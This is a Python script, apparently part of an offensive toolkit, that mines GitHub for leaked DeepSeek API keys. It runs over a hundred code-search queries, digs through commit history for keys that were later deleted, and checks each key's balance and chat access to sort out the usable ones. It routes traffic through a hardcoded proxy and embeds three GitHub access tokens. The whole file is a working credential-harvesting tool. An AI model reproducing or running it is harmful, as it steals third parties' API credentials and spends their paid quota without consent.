Files
hack/tools/scripts/llm-key-hunter/hunt_deepseek_v2.py
T

523 lines
24 KiB
Python

#!/usr/bin/env python3
"""DeepSeek deep-miner v2.
Over v1:
- Far broader search queries (more languages, file types, env-var spellings,
base_url / openai-compat patterns, k8s/docker/CI, Chinese terms, READMEs).
- Optional per-file commit-history scan (Stage 2c) to recover keys deleted in
prior commits, bounded per file. Uses the core API (--max-commits).
- Incremental candidate/key checkpoints so a killed run resumes.
Classification: only HTTP 401 => DEAD. Verify order balance -> chat -> reasoner.
Outputs results/deepseek_v2/.
"""
import argparse, json, os, re, subprocess, sys, time
import urllib.request, urllib.error, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from verify_cache import CachedVerifier
from content_cache import ContentCache, parse_raw_url
HERE = Path(__file__).parent
RESULTS_DIR = HERE / "results" / "deepseek_v2"
RESULTS_DIR.mkdir(parents=True, exist_ok=True)
EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt"
CANDIDATES_FILE = RESULTS_DIR / "candidates.txt"
GLOBAL_EXTRACTED = HERE / "results" / "extracted_keys.txt"
UA = "curl/8.5.0"
BASE = "https://api.deepseek.com"
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
_gh_opener = None
def gh_opener():
global _gh_opener
if _gh_opener is None:
if GH_PROXY:
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
_gh_opener = urllib.request.build_opener(h)
else:
_gh_opener = urllib.request.build_opener()
return _gh_opener
_direct_opener = None
def direct_opener():
global _direct_opener
if _direct_opener is None:
_direct_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
return _direct_opener
KEY_RE = re.compile(r"sk-[a-f0-9]{32}")
BLACKLIST = (
"00000000000000000000000000000000","1234567890abcdef1234567890abcdef",
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx","your-","example","placeholder","test-key",
)
# Direct (no proxy) for DeepSeek verification; proxy for GitHub.
def http_request(method, path, key, body=None, timeout=30):
url = f"{BASE}{path}"
h = {"User-Agent": UA, "Accept": "*/*", "Authorization": f"Bearer {key}"}
data = None
if body is not None:
data = json.dumps(body).encode(); h["Content-Type"] = "application/json"
req = urllib.request.Request(url, data=data, headers=h, method=method)
try:
with direct_opener().open(req, timeout=timeout) as resp:
return resp.getcode(), resp.read().decode("utf-8","replace")
except urllib.error.HTTPError as e:
try: return e.code, e.read().decode("utf-8","replace")
except Exception: return e.code, ""
except Exception as e:
return 0, f"network: {type(e).__name__}: {e}"
def classify_balance(code, body):
if code == 200:
try:
d = json.loads(body); bal = d.get("balance_infos") or []
if bal:
total = 0.0
for b in bal:
try: total += float(b.get("total_balance",0))
except (TypeError,ValueError): pass
if total > 0: return "USABLE", f"balance: \u00a5{total:.4f} {bal[0].get('currency','')}"
return "NO_BALANCE","balance: 0"
if d.get("is_available") is True: return "USABLE","balance: available"
if d.get("is_available") is False: return "NO_BALANCE","balance: unavailable"
return "USABLE", f"balance: {body[:120]}"
except json.JSONDecodeError:
return "USABLE", f"balance: {body[:120]}"
if code in (402,429): return "NO_BALANCE", f"bal HTTP {code}: {body[:140]}"
if code == 401: return "DEAD","401 unauthorized"
if code == 0: return "UNKNOWN", body[:160]
return "NO_ACCESS", f"bal HTTP {code}: {body[:140]}"
def classify_chat(code, body):
bl = (body or "").lower()
if code == 200:
if '"choices"' in bl or '"id"' in bl: return "USABLE","chat 200 OK"
if any(x in bl for x in ("balance","quota","arrearage","insufficient")):
return "NO_BALANCE", f"chat: {body[:120]}"
return "USABLE", f"chat: {body[:120]}"
if code in (402,429): return "NO_BALANCE", f"chat HTTP {code}: {body[:140]}"
if code == 401: return "DEAD","chat 401"
if code == 0: return "UNKNOWN", body[:160]
return "NO_ACCESS", f"chat HTTP {code}: {body[:140]}"
RANK = {"USABLE":4,"NO_BALANCE":3,"NO_ACCESS":2,"UNKNOWN":1,"DEAD":0}
def verify_key(key):
best, best_detail = "DEAD", ""
code, body = http_request("GET","/user/balance",key)
v,d = classify_balance(code,body)
if RANK[v] > RANK[best]: best,best_detail = v,d
if best == "USABLE": return best,best_detail
for model in ("deepseek-chat","deepseek-reasoner"):
code,body = http_request("POST","/v1/chat/completions",key,body={
"model":model,"messages":[{"role":"user","content":"hi"}],"max_tokens":1})
v,d = classify_chat(code,body); d = f"[{model}] {d}"
if RANK[v] > RANK[best]: best,best_detail = v,d
if best == "USABLE": return best,best_detail
return best,best_detail
def valid_key(k):
if not KEY_RE.fullmatch(k): return False
low = k.lower()
return not any(b in low for b in BLACKLIST)
SEARCH_QUERIES = [
# env-var spellings
'"DEEPSEEK_API_KEY" extension:env', '"DEEPSEEK_KEY" extension:env',
'"DEEPSEEK_TOKEN" extension:env', '"DEEPSEEK_API_KEY" filename:.env',
'"DEEPSEEK_API_KEY" extension:env.example', '"DEEPSEEK_API_KEY" extension:env.local',
# config files by extension
'"DEEPSEEK_API_KEY" extension:yaml', '"DEEPSEEK_API_KEY" extension:yml',
'"DEEPSEEK_API_KEY" extension:json', '"DEEPSEEK_API_KEY" extension:toml',
'"DEEPSEEK_API_KEY" extension:ini', '"DEEPSEEK_API_KEY" extension:cfg',
'"DEEPSEEK_API_KEY" extension:conf', '"DEEPSEEK_API_KEY" extension:properties',
'"DEEPSEEK_API_KEY" extension:env',
# more languages
'"DEEPSEEK_API_KEY" extension:py', '"DEEPSEEK_API_KEY" extension:ipynb',
'"DEEPSEEK_API_KEY" extension:js', '"DEEPSEEK_API_KEY" extension:ts',
'"DEEPSEEK_API_KEY" extension:go', '"DEEPSEEK_API_KEY" extension:java',
'"DEEPSEEK_API_KEY" extension:kt', '"DEEPSEEK_API_KEY" extension:rb',
'"DEEPSEEK_API_KEY" extension:php', '"DEEPSEEK_API_KEY" extension:cs',
'"DEEPSEEK_API_KEY" extension:rs', '"DEEPSEEK_API_KEY" extension:swift',
'"DEEPSEEK_API_KEY" extension:dart', '"DEEPSEEK_API_KEY" extension:ex',
'"DEEPSEEK_API_KEY" extension:exs', '"DEEPSEEK_API_KEY" extension:scala',
'"DEEPSEEK_API_KEY" extension:sh',
# api.deepseek.com in code
'"api.deepseek.com" extension:py', '"api.deepseek.com" extension:js',
'"api.deepseek.com" extension:ts', '"api.deepseek.com" extension:go',
'"api.deepseek.com" extension:java', '"api.deepseek.com" extension:php',
'"api.deepseek.com" extension:rb', '"api.deepseek.com" extension:cs',
'"api.deepseek.com" extension:rs', '"api.deepseek.com" extension:json',
'"api.deepseek.com" extension:yaml', '"api.deepseek.com" extension:yml',
'"api.deepseek.com/v1"', '"api.deepseek.com/v1/chat/completions"',
'"api.deepseek.com" bearer sk-', '"https://api.deepseek.com" "sk-"',
# model strings with keys
'"deepseek-chat" "sk-"', '"deepseek-reasoner" "sk-"',
'"deepseek-chat" "api_key"', '"deepseek-reasoner" "api_key"',
'"deepseek-chat" Authorization: Bearer sk-',
'"deepseek-reasoner" Authorization: Bearer sk-',
# direct assignment
'DEEPSEEK_API_KEY=sk-', 'DEEPSEEK_KEY=sk-', 'DEEPSEEK_TOKEN=sk-',
'deepseek_api_key=sk-', 'DeepSeek_API_KEY=sk-', 'deepseekToken=sk-',
'deepseek_api_secret=sk-', 'DEEPSEEK_API_SECRET=sk-',
# openai-compat / base_url
'"base_url" "api.deepseek.com" extension:py',
'"base_url" "https://api.deepseek.com"',
'"base_url" "api.deepseek.com" extension:js',
'"api.deepseek.com" "OPENAI_API_KEY"',
'"api.deepseek.com" filename:.env', 'deepseek "base_url" filename:.env',
# config filenames
'deepseek "sk-" filename:config.json', 'deepseek "sk-" filename:config.toml',
'deepseek "sk-" filename:config.yaml', 'deepseek "sk-" filename:config.yml',
'deepseek "sk-" filename:config.py', 'deepseek "sk-" filename:settings.py',
'deepseek "sk-" filename:local.settings.json',
'deepseek "sk-" filename:application.yml',
'deepseek "sk-" filename:application.properties',
'deepseek "sk-" filename:secrets.yaml', 'deepseek "sk-" filename:secrets.yml',
# docker / k8s / CI
'"DEEPSEEK_API_KEY" filename:docker-compose',
'"DEEPSEEK_API_KEY" filename:Dockerfile',
'"DEEPSEEK_API_KEY" path:.github',
'"DEEPSEEK_API_KEY" path:.gitlab',
'"DEEPSEEK_API_KEY" filename:.gitlab-ci',
'"api.deepseek.com" filename:values.yaml',
'"api.deepseek.com" filename:deployment.yaml',
'"api.deepseek.com" filename:configmap',
# generic .env with deepseek
'deepseek "sk-" filename:.env', 'deepseek-chat filename:.env',
'deepseek-reasoner filename:.env', '"deepseek/v1" filename:.env',
# SDK / client init
'DeepSeek(api_key=sk-', 'OpenAI(api_key=sk- "api.deepseek.com"',
'deepseek.DeepSeek sk-', 'new DeepSeek sk-',
# Chinese terms / docs / README
'"deepseek" "sk-" extension:md', '"deepseek" "api_key" extension:md',
'deepseek "sk-" filename:README', '"DEEPSEEK_API_KEY" filename:README',
'deepseek "\u7834\u89e3" sk-', 'deepseek "\u514d\u8d39" sk-',
# proxy/gateway projects that embed upstream keys
'"DEEPSEEK_API_KEY" filename:docker-compose.yml',
'"deepseek" "sk-" filename:docker-compose',
'"deepseek" "sk-" filename:.env.example',
# one-api / new-api style channel configs
'"deepseek" "sk-" filename:渠道', '"deepseek" "key" filename:channels',
# broader bare key near deepseek
'deepseek sk-[a-f0-9]', '"sk-" "deepseek-chat" extension:py',
]
def github_tokens():
"""Return a list of GitHub tokens from env (comma-separated), gh CLI, hosts.yml,
and the known hardcoded pool in run_full.sh."""
toks = []
env_tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
if env_tok:
for t in re.split(r"[,\s]+", env_tok):
if t.strip(): toks.append(t.strip())
try:
out = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
if out.returncode == 0 and out.stdout.strip(): toks.append(out.stdout.strip())
except FileNotFoundError: pass
hosts = Path.home()/".config"/"gh"/"hosts.yml"
if hosts.exists():
for line in hosts.read_text().splitlines():
line=line.strip()
if line.startswith("oauth_token:"):
t=line.split(":",1)[1].strip()
if t: toks.append(t)
# known pool from run_full.sh
toks += [
"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",
"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",
"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",
]
seen=set(); uniq=[]
for t in toks:
if t and t not in seen:
seen.add(t); uniq.append(t)
return uniq
_token_idx = 0
_token_remaining = {} # token -> code_search remaining (approx)
def next_token(tokens):
global _token_idx
if not tokens: return None
# pick the token with highest known remaining, else round-robin
if _token_remaining:
best = max(tokens, key=lambda t: _token_remaining.get(t, 5))
if _token_remaining.get(best, 5) > 0:
_token_idx = tokens.index(best)
return best
t = tokens[_token_idx % len(tokens)]
_token_idx += 1
return t
def gh_api(url, tokens, wants_json=True):
if isinstance(tokens, str): tokens=[tokens]
headers_base = {"Accept":"application/vnd.github+json","User-Agent":"key-hunter"}
for attempt in range(12):
token = next_token(tokens)
headers = dict(headers_base)
if token: headers["Authorization"]=f"Bearer {token}"
req = urllib.request.Request(url, headers=headers)
try:
with gh_opener().open(req, timeout=30) as resp:
raw = resp.read()
rem = resp.headers.get("X-RateLimit-Remaining")
if token and rem is not None:
_token_remaining[token] = int(rem)
return json.loads(raw) if wants_json else raw
except urllib.error.HTTPError as e:
if e.code in (403,429):
reset = e.headers.get("X-RateLimit-Reset")
rem = e.headers.get("X-RateLimit-Remaining")
if token:
if rem is not None: _token_remaining[token] = int(rem)
else: _token_remaining[token] = 0
# try another token immediately if one has budget left
ready = [t for t in tokens if _token_remaining.get(t, 5) > 0 and t != token]
if ready and attempt < 10:
continue
wait = max(int(reset)-int(time.time()),5) if reset else 30
print(f" [pool {len(tokens)}] all tokens throttled, waiting {wait}s...", file=sys.stderr)
time.sleep(wait+1); continue
if e.code == 422: return None
e.read()
return None
except Exception as e:
print(f" network: {e}", file=sys.stderr); time.sleep(3)
return None
def gh_search(query, tokens, per_page=100, max_pages=10):
for page in range(1, max_pages+1):
url = ("https://api.github.com/search/code"
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
data = gh_api(url, tokens)
if not data: return
items = data.get("items",[])
if not items: return
for it in items: yield it
if len(items) < per_page: return
# with a pool we don't need the long sleep; brief pause to spread load
time.sleep(0.6 if tokens else 7)
def to_raw_url(html_url):
return html_url.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
def split_html_url(html_url):
# https://github.com/owner/repo/blob/sha/path
try:
m = re.match(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)", html_url)
if m: return m.group(1), m.group(2), m.group(3)
except Exception: pass
return None,None,None
def fetch_raw(url):
req = urllib.request.Request(url, headers={"User-Agent":"Mozilla/5.0"})
try:
with gh_opener().open(req, timeout=20) as resp:
return resp.read().decode("utf-8","replace")
except Exception:
return ""
def make_cached_fetch(cc, fetcher=fetch_raw):
"""fetch_raw replacement served by ContentCache (immutable blob SHA)."""
def cached(url):
repo, sha, path = parse_raw_url(url)
if repo and sha and path:
txt = cc.get(repo, path, sha)
if txt is not None:
return txt
txt = fetcher(url)
if txt:
cc.put(repo, path, sha, txt)
return txt
return fetcher(url)
return cached
def list_file_commits(repo, path, token, max_commits=3):
"""List commit SHAs touching a file (core API, 1 per page*path). Bounded."""
shas = []
url = ("https://api.github.com/repos/"+repo+"/commits"
f"?path={urllib.parse.quote(path)}&per_page={max_commits}")
data = gh_api(url, token)
if not data: return shas
for c in data:
try: shas.append(c["sha"])
except Exception: pass
return shas
def fetch_commit_file(repo, sha, path, token):
"""Fetch file content at a given commit via raw.githubusercontent."""
url = f"https://raw.githubusercontent.com/{repo}/{sha}/{path}"
return fetch_raw(url)
def extract_keys(text, keys, src):
n = 0
for k in KEY_RE.findall(text or ""):
if valid_key(k) and k not in keys:
keys[k] = src; n += 1
return n
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--verify-only", action="store_true")
ap.add_argument("--workers", type=int, default=20)
ap.add_argument("--commit-workers", type=int, default=10)
ap.add_argument("--max-commits", type=int, default=0,
help="per-file commit history depth (0 disables Stage 2c)")
ap.add_argument("--limit", type=int, default=0)
ap.add_argument("--no-cache", action="store_true",
help="ignore verification cache")
ap.add_argument("--no-content-cache", action="store_true",
help="ignore raw file content cache (always re-crawl)")
ap.add_argument("--resume-search", action="store_true",
help="load candidate files from candidates.txt checkpoint")
args = ap.parse_args()
keys = {}
if GLOBAL_EXTRACTED.exists():
for line in GLOBAL_EXTRACTED.read_text().splitlines():
if not line.startswith("DeepSeek|"): continue
parts = line.split("|",3)
if len(parts) >= 3 and valid_key(parts[1]):
keys[parts[1]] = parts[2]
# also merge v1 extracted
v1 = HERE/"results"/"deepseek_deep"/"extracted_keys.txt"
if v1.exists():
for line in v1.read_text().splitlines():
p = line.split("|",1)
if p and valid_key(p[0]): keys.setdefault(p[0], p[1] if len(p)>1 else "v1")
print(f"loaded {len(keys)} previously-known DeepSeek keys")
candidates = {}
if args.resume_search and CANDIDATES_FILE.exists():
for line in CANDIDATES_FILE.read_text().splitlines():
if "|" in line:
u,r = line.split("|",1); candidates[u]=r
print(f"resumed {len(candidates)} candidates from checkpoint")
if not args.verify_only:
tokens = github_tokens()
print(f"GitHub tokens: {len(tokens)} pool ({', '.join(t[:10]+'…' for t in tokens)})\n")
print("=== Stage 1: code search ===")
for i,q in enumerate(SEARCH_QUERIES,1):
print(f" [{i:3d}/{len(SEARCH_QUERIES)}] {q}")
try:
for it in gh_search(q, tokens):
u = it.get("html_url","")
if u and u not in candidates:
candidates[u] = it.get("repository",{}).get("full_name","?")
except Exception as e:
print(f" error: {e}", file=sys.stderr)
if i % 10 == 0:
with open(CANDIDATES_FILE,"w") as f:
for u,r in candidates.items(): f.write(f"{u}|{r}\n")
with open(CANDIDATES_FILE,"w") as f:
for u,r in candidates.items(): f.write(f"{u}|{r}\n")
print(f" candidate files: {len(candidates)}")
print("\n=== Stage 2a: fetch HEAD raw & extract ===")
fetched=new=0
with ContentCache(force=getattr(args,"no_content_cache",False)) as cc:
cfetch = make_cached_fetch(cc)
with ThreadPoolExecutor(max_workers=20) as pool:
futs = {pool.submit(cfetch, to_raw_url(u)): u for u in candidates}
for fut in as_completed(futs):
u=futs[fut]; fetched+=1
try: content=fut.result()
except Exception: content=""
new += extract_keys(content, keys, u)
if fetched % 200 == 0:
print(f" {fetched}/{len(candidates)} keys={len(keys)} new={new} "
f"cache={cc.hits}hit/{cc.misses}fetch")
with open(EXTRACTED_FILE,"w") as f:
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
st=cc.stats()
print(f" content cache: {st['hits']} hits, {st['misses']} fetched "
f"({st['bytes_served']} bytes from cache)")
print(f" after HEAD: {len(keys)} keys ({new} new)")
if args.max_commits > 0 and tokens:
print(f"\n=== Stage 2c: per-file commit history (depth {args.max_commits}) ===")
repo_paths = {}
for u in candidates:
repo,sha,path = split_html_url(u)
if repo and path: repo_paths.setdefault(repo,set()).add(path)
tasks = []
for repo, paths in repo_paths.items():
for path in paths: tasks.append((repo,path))
print(f" {len(tasks)} (repo,path) pairs across {len(repo_paths)} repos")
done=0
with ContentCache(force=getattr(args,"no_content_cache",False)) as cc:
cfetch = make_cached_fetch(cc)
def job(rp):
repo,path = rp
shas = list_file_commits(repo,path,tokens,args.max_commits)
found=[]
for sha in shas:
txt = cfetch(f"https://raw.githubusercontent.com/{repo}/{sha}/{path}")
for k in KEY_RE.findall(txt or ""):
if valid_key(k): found.append((k,f"https://github.com/{repo}/blob/{sha}/{path}"))
return found
with ThreadPoolExecutor(max_workers=args.commit_workers) as pool:
futs={pool.submit(job,t):t for t in tasks}
for fut in as_completed(futs):
done+=1
try:
for k,src in fut.result():
if k not in keys: keys[k]=src; new+=1
except Exception: pass
if done % 100 == 0:
print(f" {done}/{len(tasks)} keys={len(keys)} new={new} "
f"cache={cc.hits}hit/{cc.misses}fetch")
with open(EXTRACTED_FILE,"w") as f:
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
st=cc.stats()
print(f" commit content cache: {st['hits']} hits, {st['misses']} fetched")
print(f" after commits: {len(keys)} keys")
with open(EXTRACTED_FILE,"w") as f:
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
if args.limit>0:
keys=dict(list(keys.items())[:args.limit])
print(f" (limited to {args.limit})")
print(f"\n=== Stage 3: verify {len(keys)} keys (workers={args.workers}) ===")
buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]}
processed=0; start=time.time()
with CachedVerifier("deepseek", verify_key, force=args.no_cache) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as pool:
futs={pool.submit(ver,k):(k,s) for k,s in keys.items()}
for fut in as_completed(futs):
k,s=futs[fut]; processed+=1
try: v,d=fut.result()
except Exception as e: v,d="UNKNOWN",f"exc: {e}"
buckets[v].append((k,s,d))
if processed%100==0:
el=time.time()-start
print(f" [{processed:5d}/{len(keys)}] use={len(buckets['USABLE'])} "
f"nobal={len(buckets['NO_BALANCE'])} noacc={len(buckets['NO_ACCESS'])} "
f"unk={len(buckets['UNKNOWN'])} dead={len(buckets['DEAD'])} ({processed/el:.1f}/s)")
print(f" cache: {ver.stats()['hits']} hits, {ver.stats()['live']} live queries")
el=time.time()-start; print(f"\nDone in {el:.1f}s")
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN","DEAD"):
p=RESULTS_DIR/f"{name.lower()}.txt"
with open(p,"w") as f:
for k,s,d in sorted(buckets[name]): f.write(f"{k}|{s}|{d}\n")
print(f" {name:11s}: {len(buckets[name]):5d} -> {p.name}")
with open(RESULTS_DIR/"all_non_401.txt","w") as f:
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"):
for k,s,d in sorted(buckets[name]): f.write(f"{name}|{k}|{s}|{d}\n")
if buckets["USABLE"]:
print("\n=== USABLE KEYS ===")
for k,s,d in sorted(buckets["USABLE"]):
print(f" {k}\n src: {s}\n {d}")
if __name__ == "__main__":
main()